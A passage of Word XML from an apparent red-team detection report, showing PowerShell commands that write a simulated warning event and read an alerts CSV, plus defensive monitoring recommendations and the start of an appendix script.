              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc11014"/>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10</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csv file of log for all the phases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F800A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs can also be triggered directly by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">writing event log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>that contains triggering terms from windows PowerShell as shown below, we have triggered logs for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> evasion and exfil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">directly from the windows PowerShell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F02FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>For triggering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C26AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-EventLog -LogName “RedTeamLogg” -Source “RedTeamSimm” -EntryType Warning -EventID 1003 -Message “Simulated Evasion Test from 192.168.1.43”  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9C11F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">To get log details from shell  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5FA51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Get-Content C:\redteam-monitor]unified_alerts.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-Tail 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38681488">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5731510" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5715"/>
            <wp:docPr id="6" name="Picture 6" descr="evasion and exfil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vasion and exfil logs"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2143125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C8A5B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5728970" cy="1929130"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="7" name="Picture 7" descr="all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ll logs"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5728970" cy="1929130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C69FD2D">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc31517"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Shows windows PowerShell triggered logs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0E6D70F8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines/>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00" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc21691"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="1F8BC733">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Continuous monitoring of file system activity for early detection of unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8615A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Enforce PowerShell logging and alerting for obfuscated scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C66F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Regularly review unified_alerts.csv or similar logs to validate monitoring coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A00682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Conduct routine simulations to improve detection and response readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868C42F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0701DB1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07518447">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C46952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5035A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CCECF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5679D8C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C71590">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B73DA65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A81EAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521443C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B20180D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F1F931">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BBB78D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D76F12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F384EB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742F3FED">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc169"/>
      <w:bookmarkStart w:id="25" w:name="_APPENDIX A"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:p w14:paraId="3E488756">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$logFile = "C:\redteam-monitor\unified_alerts.csv"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6052B42E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Write-Host "[*] Unified Red Team Detection Monitor Started..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F65A31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7564C73A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t># Create CSV header if file doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B21F8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>if (!(Test-Path $logFile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F0392">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
